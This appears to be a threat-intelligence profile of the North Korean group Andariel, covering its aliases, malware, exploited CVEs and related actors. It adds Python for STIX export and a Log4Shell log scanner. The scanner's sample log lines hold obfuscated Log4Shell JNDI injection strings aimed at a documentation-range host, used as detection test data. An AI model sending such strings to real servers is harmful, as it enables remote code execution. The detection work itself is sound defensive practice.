Andariel

Threat Actor Profile Updated 2 months ago
Andariel is a North Korea-linked threat actor that most vendors treat as a sub-group of the Lazarus Group; it is also tracked as Onyx Sleet, Stonefly and Silent Chollima (see the cluster overlaps below). Kaspersky observed the group deploying the DTrack backdoor and Maui ransomware in mid-2022, and it has a long record of exploiting ActiveX controls. Researchers note that its tactics, techniques and procedures (TTPs) overlap heavily with those of other North Korean APT groups, Lazarus and Kimsuky in particular. After initial compromise the group has used the MeshAgent remote-management agent for access and a custom proxy implant, HazyLoad, to keep a direct channel into infected hosts; a previously undocumented malware family, EarlyRat, was also added to its toolset.

From October 2022 to July 2023, Andariel, Lazarus and Kimsuky ran concurrent espionage campaigns against 83 South Korean defense contractors and exfiltrated confidential data from about ten of them. The Korean National Police Agency (KNPA), whose investigation confirmed the three parallel campaigns, attributed all of them to North Korean state-backed groups. In the intrusion attributed to Andariel, the group obtained the credentials of an employee at a company that provides remote IT and server maintenance for one of the contractors and used that third-party access as its entry point into the defense company's network.
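The page offers this profile as a STIX download. The following Python is an added example, not code from this page or from any vendor feed: it encodes only the names recorded above (the actor, its aliases, the malware families and the CVEs) as a STIX 2.1 bundle of threat-actor, malware, vulnerability and relationship objects, and runs a small reference check over the result. Its assumptions are its own: deterministic UUIDv5 identifiers under a made-up namespace URL (STIX 2.1 recommends UUIDv4 for domain objects but accepts any RFC 4122 UUID), the malware_types value chosen for each family, and the use of the `uses` and `targets` relationship types.

```python
import json
import re
import uuid
from datetime import datetime, timezone

# Namespace for deterministic UUIDv5 ids: the same name always yields the same STIX id,
# so repeated exports de-duplicate cleanly in a TIP. The namespace URL is this example's
# own (made-up) choice; STIX 2.1 recommends UUIDv4 for SDOs but accepts any RFC 4122 UUID.
NAMESPACE = uuid.uuid5(uuid.NAMESPACE_URL, "https://cti.example.invalid/andariel")

# Facts as recorded on this profile page, and nothing beyond them.
PROFILE = {
    "name": "Andariel",
    "aliases": ["Onyx Sleet", "Stonefly", "Silent Chollima"],
    # family name -> malware-type-ov value; "unknown" where the page gives no closer term
    "malware": {
        "DTrack": "backdoor",
        "Maui": "ransomware",
        "EarlyRat": "remote-access-trojan",
        "NineRAT": "remote-access-trojan",
        "HazyLoad": "unknown",  # custom proxy implant
    },
    "vulnerabilities": ["CVE-2021-44228", "CVE-2023-42793", "CVE-2023-46604"],
}

STIX_ID = re.compile(r"^[a-z][a-z0-9-]*--[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$")
STIX_TS = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}Z$")


def stix_id(obj_type: str, key: str) -> str:
    """Deterministic '<type>--<uuid5>' identifier for a given object type and key."""
    return f"{obj_type}--{uuid.uuid5(NAMESPACE, f'{obj_type}:{key}')}"


def stix_timestamp(when: datetime) -> str:
    """RFC 3339 UTC timestamp with trailing Z, millisecond precision, as STIX requires."""
    utc = when.astimezone(timezone.utc)
    return utc.strftime("%Y-%m-%dT%H:%M:%S.") + f"{utc.microsecond // 1000:03d}Z"


def _sdo(obj_type, key, when, **props):
    stamp = stix_timestamp(when)
    return {"type": obj_type, "spec_version": "2.1", "id": stix_id(obj_type, key),
            "created": stamp, "modified": stamp, **props}


def relationship(rel_type, src, dst, when):
    return _sdo("relationship", f"{rel_type}:{src['id']}:{dst['id']}", when,
                relationship_type=rel_type, source_ref=src["id"], target_ref=dst["id"])


def build_bundle(profile=PROFILE, when=None):
    """Threat actor first, then each malware/vulnerability followed by its relationship."""
    when = when or datetime.now(timezone.utc)
    actor = _sdo("threat-actor", profile["name"], when,
                 name=profile["name"], aliases=profile["aliases"],
                 threat_actor_types=["nation-state"], resource_level="government")
    objects = [actor]
    for name, kind in profile["malware"].items():
        mal = _sdo("malware", name, when, name=name, is_family=True, malware_types=[kind])
        objects += [mal, relationship("uses", actor, mal, when)]
    for cve in profile["vulnerabilities"]:
        vuln = _sdo("vulnerability", cve, when, name=cve,
                    external_references=[{"source_name": "cve", "external_id": cve}])
        objects += [vuln, relationship("targets", actor, vuln, when)]
    return {"type": "bundle", "id": stix_id("bundle", profile["name"]), "objects": objects}


def validate(bundle):
    """Cheap consistency check: well-formed ids and timestamps, no duplicate ids,
    every relationship end present in the bundle. Returns a list of problems (empty = OK)."""
    problems = []
    ids = [o["id"] for o in bundle["objects"]]
    if len(ids) != len(set(ids)):
        problems.append("duplicate ids")
    for o in bundle["objects"]:
        if not STIX_ID.match(o["id"]) or o["type"] != o["id"].split("--")[0]:
            problems.append(f"bad id {o['id']}")
        if not STIX_TS.match(o["created"]):
            problems.append(f"bad timestamp on {o['id']}")
        if o["type"] == "relationship":
            for ref in (o["source_ref"], o["target_ref"]):
                if ref not in ids:
                    problems.append(f"dangling reference {ref}")
    return problems


if __name__ == "__main__":
    bundle = build_bundle()
    assert validate(bundle) == []
    print(json.dumps(bundle, indent=2))
```

Deterministic ids mean a re-export after the profile is updated yields the same object ids, so a consuming platform merges rather than duplicates; the trade-off is that two producers sharing a namespace would collide, so keep the namespace private to one producer.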
Given the severity and sophistication of these intrusions, organizations should apply vendor security fixes as soon as they are released. The flaws recorded on this page, Log4Shell (CVE-2021-44228), the JetBrains TeamCity authentication bypass (CVE-2023-42793) and the Apache ActiveMQ OpenWire remote code execution bug (CVE-2023-46604), are exactly the kind of widely exposed vulnerability that nation-state actors, including Russia's APT29 and North Korea's Lazarus and Andariel, as well as ransomware gangs, have exploited in the past.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID / Votes / Profile description
Lazarus Group
5
The Lazarus Group, a notorious threat actor believed to be linked to North Korea, has been attributed with a series of significant cyber-attacks over the past few years. The group's malicious activities include the exploitation of digital infrastructure, stealing cryptocurrency, and executing large-
Onyx Sleet
4
Onyx Sleet, a North Korean nation-state threat actor, has been identified as a significant cybersecurity risk by Microsoft. Operating under the Lazarus Group umbrella, Onyx Sleet primarily targets defense and IT services organizations in South Korea, the United States, and India. In October 2023, Mi
Stonefly
3
Stonefly, also known as Andariel or Silent Chollima, is a threat actor group believed to be linked with the North Korean government. Active since at least 2015, Stonefly has been involved in numerous attacks, including several attributed to the North Korean state-sponsored operation Lazarus. The gro
Silent Chollima
3
Silent Chollima, a North Korea-nexus threat actor, is known for its malicious cyber activities. The group is assessed to sit within the 3rd Bureau (foreign intelligence) of the Reconnaissance General Bureau, North Korea's foreign intelligence agency, and has been associated with other groups such as Lazarus,
RGB
3
RGB, a threat actor with ties to North Korea, has been involved in a range of malicious cyber activities. The group was designated by the Office of Foreign Assets Control (OFAC) on January 2, 2015, under Executive Order 13687 for being a controlled entity of the North Korean government. In addition
Reconnaissance General Bureau
3
The Reconnaissance General Bureau (RGB) is a North Korean intelligence agency responsible for clandestine operations abroad, including cyber activities. The RGB has been associated with several threat actors, including the BeagleBoyz, who have likely been active since at least 2014. Other groups lin
APT38
2
APT38, also known as TA444, BlueNoroff, BlackAlicanto, Copernicium, Sapphire Sleet, Stardust Chollima, and TraderTraitor, is a threat actor group suspected to be backed by the North Korean regime. The group has been active in operations across over 16 organizations in at least 11 countries, primaril
BlueNoroff
2
BlueNoroff, a threat actor closely associated with the notorious Lazarus Group, has been actively involved in malicious cyber activities primarily targeting financial institutions and cryptocurrency businesses. Known for its sophisticated attacks on banks, casinos, fintech companies, POST software,
ZINC
2
Zinc, also known as Diamond Sleet, is a North Korea-based threat actor group that has been actively involved in cyberattacks on global media, defense, and IT industries. Microsoft's Threat Intelligence Center has been tracking the group's activities, which have included weaponizing open-source softw
Reconnaissance General Bureau (RGB)
2
The Reconnaissance General Bureau (RGB) is a North Korean military intelligence agency identified as a threat actor responsible for various cyberattacks. RGB is associated with hacking groups known as the "Lazarus Group," "Bluenoroff," and "Andariel," which are recognized as agencies or controlled e
Plutonium
2
PLUTONIUM is the name Microsoft used for this cluster before it moved to its weather-themed naming scheme, under which the same actor is tracked as Onyx Sleet. The profile text attached to this entry in the dataset concerns the 1960s NUMEC plutonium-diversion affair and is unrelated to the threat actor.
APT43
1
APT43, also known as Kimsuky, is a North Korean state-sponsored advanced persistent threat (APT) group that has been actively involved in cybercrime and espionage. The group has been implicated in a series of attacks exploiting vulnerabilities, which have drawn the attention of various cybersecurity
Labyrinth Chollima
1
Labyrinth Chollima, a threat actor linked to North Korea, has been involved in numerous malicious activities since 2009. Tracked by CrowdStrike and other cybersecurity organizations, Labyrinth Chollima is part of the Lazarus Group, known for stealthy attacks targeting various industries such as acad
Blacksmith
1
Operation Blacksmith is the name Cisco Talos gave to a Lazarus Group campaign, reported in December 2023, that exploited the Log4Shell flaw in Log4j to deploy malware written in the D programming language, including the Telegram-based NineRAT and the HazyLoad proxy implant. It is unrelated to the 2021 "Blacksmith" Rowhammer fuzzing research, whose description is sometimes conflated with it.
LilacSquid
1
LilacSquid is a threat actor that has been actively targeting organizations in the U.S., Europe, and Asia since at least 2021. This group utilizes various tactics, techniques, and procedures (TTPs) to execute their malicious activities, including the use of Secure Socket Funneling (SSF) to establish
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Apt, Malware, Korean, Ransomware, Cybercrime, Reconnaissance, Police, Exploit, Vulnerability, Log4j, Proxy, Telegram, Backdoor, State Sponso..., Downloader, Espionage, Teamcity, Bitcoin, Ransom, Extortion, Rat, Microsoft, Apache Activ..., Kaspersky, Blacksmith, Operation Bl..., Dropper, Implant, Payload, Windows, Trojan, Fraud, Phishing, Lateral Move...
Associated Malware
ID / Type / Votes / Profile description
EarlyRat (type unspecified)
2
EarlyRat is a previously undocumented malware family that Kaspersky researchers described in June 2023. Andariel used it in 2022 attacks that exploited the Log4j Log4Shell vulnerability. The malware was first noticed in one of the Log4j cases,
NineRAT (type unspecified)
2
NineRAT is a malware strain developed by the Lazarus Group and used in Operation Blacksmith. Although built around May 2022, it was first observed in use in March 2023 against a South American agricultural organization and again in September 2023 against a European manufactur
CollectionRAT (type unspecified)
2
CollectionRAT is a remote access trojan identified by researchers who traced its origins through reused infrastructure components. It gives its operators control of infected computers and devices, often infiltrating systems via suspicious download
LockBit (type unspecified)
1
LockBit is a type of malware, specifically ransomware, that infiltrates systems to exploit and damage them. It can enter your system through various channels such as suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt
DTrack (type unspecified)
1
DTrack is a backdoor malware family used for reconnaissance and data theft rather than direct destruction. It can arrive through dubious downloads, emails or exploited services, and has been used to steal information, disrupt operations and stage ransomware. Notably, DTrack was utiliz
WannaCry (type unspecified)
1
WannaCry is a type of malware, specifically ransomware, that caused significant global disruption in 2017. It exploited Windows SMBv1 Remote Code Execution Vulnerabilities (CVE-2017-0144, CVE-2017-0145, CVE-2017-0143), which allowed it to spread rapidly and infect over 200,000 machines across more t
DTrack backdoor (type unspecified)
1
The DTrack backdoor is malware used primarily by the Andariel group, a North Korean state-sponsored actor. In the cases described, Andariel compromised Windows machines through a Log4j exploit and then downloaded additional tooling from a command-and-control (C2)
MagicRAT (type unspecified)
1
MagicRAT is malware first described by Cisco Talos in 2022 and deployed by the Lazarus Group after exploiting vulnerabilities in publicly exposed VMware Horizon servers, primarily at energy companies worldwide. This malicious software, which can infiltrate systems through suspicious d
Associated Threat Actors
ID / Type / Votes / Profile description
Kimsuky (type unspecified)
5
Kimsuky is a North Korea-linked advanced persistent threat (APT) group that conducts global cyber-attacks to gather intelligence for the North Korean government. The group has been identified as a significant threat actor, executing actions with malicious intent, and has recently targeted victims vi
TEMP.Hermit (type unspecified)
2
Temp.Hermit, also known as Lazarus Group or Hidden Cobra, is a threat actor group associated with North Korea's Reconnaissance General Bureau (RGB). The group has been operational since 2013 and is known for its cyberespionage activities targeting governments and sectors such as defense, telecommuni
Lazarus Team (type unspecified)
1
(no description recorded)
Diamond Sleet (type unspecified)
1
Diamond Sleet, a North Korea-linked Advanced Persistent Threat (APT), has been identified as a significant threat actor in the cybersecurity landscape. This group is known for its sophisticated supply chain attacks, specifically leveraging CyberLink software to execute their malicious activities. Th
APT37 (type unspecified)
1
APT37, also known as ScarCruft, Reaper, or Group123, is a threat actor suspected to be linked to North Korea. It primarily targets South Korea but has also extended its activities to Japan, Vietnam, and the Middle East, focusing on various industry verticals such as chemicals, electronics, manufactu
ScarCruft (type unspecified)
1
ScarCruft, also known as APT37, Inky Squid, RedEyes, Reaper, or Group123, is a North Korean threat actor group associated with malicious cyber activities. Their actions have been linked to the execution of targeted attacks against individual Android devices, as outlined in a VB2023 paper titled "Int
APT29 (type unspecified)
1
APT29, also known as Cozy Bear, SVR group, BlueBravo, Nobelium, Midnight Blizzard, and The Dukes, is a threat actor linked to Russia. This group is notorious for its malicious activities in the cybersecurity realm, executing actions with harmful intent. It has been associated with several high-profi
Associated Vulnerabilities
ID / Type / Votes / Profile description
CVE-2023-42793 (type unspecified)
4
CVE-2023-42793 is a critical security vulnerability identified in JetBrains TeamCity build management and continuous integration server. This flaw, characterized by an authentication bypass, was exploited by multiple threat actors throughout 2023 and into 2024. The first notable exploitation occurre
Log4Shell (type unspecified)
3
Log4Shell is a software vulnerability, specifically a flaw in the design or implementation of the popular Java logging library, Log4j. Identified as CVE-2021-44228, this vulnerability allows an attacker to remotely execute arbitrary code, often leading to full system compromise. Advanced Persistent
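Log4Shell is the entry vector behind the Log4j-related associations on this page, and the same lookup syntax that makes it exploitable lets attackers hide the `jndi:` marker from naive substring matches. As an added example, not code from the page or from any vendor, the Python below normalises Log4j 2 lookup nesting (`${lower:..}`, `${upper:..}` and the `${key:-default}` fallback form) before matching, and runs over a handful of constructed web-server log lines using 203.0.113.0/24 documentation addresses. The function names and the log lines are this example's own.

```python
import re

# Innermost Log4j 2 lookup: "${...}" whose body contains no further "${" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# JNDI reference schemes that a vulnerable Log4j (CVE-2021-44228) will dereference.
JNDI_REF = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 64) -> str:
    """Collapse the lookup tricks used to hide 'jndi' from substring matching.

    Resolves, innermost first:
      ${lower:X} / ${upper:X}   -> case-folded X
      ${prefix:key:-default}    -> default   (e.g. ${::-j}, ${env:NOPE:-j})
    Every key is treated as unresolvable, which is exactly what the attacker relies on.
    Other lookups (${jndi:...}, ${date:...}, ${env:X}) are left in place so the
    jndi: marker survives for the final match. Stops when a round changes nothing.
    """
    def resolve(match: re.Match) -> str:
        body = match.group(1)
        if ":-" in body:
            return body.split(":-", 1)[1]
        prefix, sep, arg = body.partition(":")
        if sep and prefix.lower() == "lower":
            return arg.lower()
        if sep and prefix.lower() == "upper":
            return arg.upper()
        return match.group(0)

    for _ in range(max_rounds):
        rewritten = INNER_LOOKUP.sub(resolve, text)
        if rewritten == text:
            break
        text = rewritten
    return text


def scan(lines):
    """One finding per line whose normalised form carries a JNDI reference."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        hit = JNDI_REF.search(normalized)
        if hit:
            findings.append({"line": number, "scheme": hit.group(1).lower(),
                             "normalized": normalized, "raw": line})
    return findings


# Constructed sample access-log lines (203.0.113.0/24 is a documentation range), not real traffic.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:02:20 +0000] "GET /?q=${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/Exploit} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:02:31 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/x}"',
    'app 2021-12-10T10:03:00Z INFO scheduled task ${date:yyyy-MM-dd} completed',
    '10.0.0.9 - - [10/Dec/2021:10:03:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOTEXIST:-j}ndi:dns://203.0.113.7/${hostName}}"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(f"line {finding['line']}: jndi {finding['scheme']} -> {finding['normalized']}")
```

Anything the normaliser rewrites is itself a signal, since legitimate requests do not carry nested lookups. The scheme list covers the references Log4j resolves via JNDI; a hit on dns:// is usually a scan or exfiltration probe rather than a code-execution attempt, but it still identifies a hostile source worth blocking.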
CVE-2023-46604 (type unspecified)
1
CVE-2023-46604 is a critical vulnerability identified in Apache ActiveMQ, specifically affecting versions prior to 5.15.16, 5.16.7, 5.17.6, and 5.18.3. This flaw, which lies within the Java OpenWire protocol marshaller, allows for Remote Code Execution (RCE) and has been assigned a maximum severity
HazyLoad (type unspecified)
1
HazyLoad is not a vulnerability but a custom proxy implant that Andariel deployed on hosts compromised through the Log4j flaw. It gives the operators a direct connection to the infected system, so they no longer need to re-exploit Log4Shell to get back in, and serves as their persistence mechanism. It appears in this list because the corpus ties it to the Log4j exploitation chain.
Source Document References
Information about the Andariel threat actor was read from the documents below (display limited to 20 results).
Source / Created at / Title
DARKReading
2 months ago
LilacSquid APT Employs Open Source Tools, QuasarRAT
Securityaffairs
2 months ago
LilacSquid APT targeted orgs in the U.S., Europe, and Asia
Securelist
3 months ago
APT trends report Q1 2024 – Securelist
Checkpoint
3 months ago
29th April – Threat Intelligence Report - Check Point Research
DARKReading
3 months ago
3 DPRK APTs Spied on South Korea Defense Industry
InfoSecurity-magazine
3 months ago
North Korean Hackers Target Dozens of Defense Companies
Securityaffairs
3 months ago
North Korea-linked APT groups target South Korean defense contractors
CERT-EU
5 months ago
Critical JetBrains TeamCity flaws come under active attacks
CERT-EU
5 months ago
JetBrain urges to fix critical TeamCity On-Premises vulnerabilities
CERT-EU
7 months ago
Cyber Security Week In Review: December 29, 2023
CERT-EU
7 months ago
Apache ActiveMQ Vulnerability: The Threat That Cannot Be Ignored
DARKReading
7 months ago
Global TeamCity Exploitation Opens Door to SolarWinds-Style Nightmare
BankInfoSecurity
7 months ago
Lazarus Exploits Log4Shell to Deploy Telegram-Based Malware
CERT-EU
7 months ago
Lazarus Group continues to exploit Log4j flaw in latest campaign
CERT-EU
7 months ago
Lazarus Group Exploits Log4j Flaw in New Malware Campaign
CERT-EU
7 months ago
Lazarus Cyber Group Deploys DLang Malware Strains - Slashdot
Securityaffairs
7 months ago
Operation Blacksmith: Lazarus exploits Log4j flaws to deploy DLang malware
CERT-EU
7 months ago
Stronger action against North Korean cyber threats pushed by US, South Korea, Japan
CERT-EU
8 months ago
Lazarus Group bang on trend with memory-safe Dlang malware
DARKReading
8 months ago
Lazarus Group Is Still Juicing Log4Shell, Using RATs Written in 'D'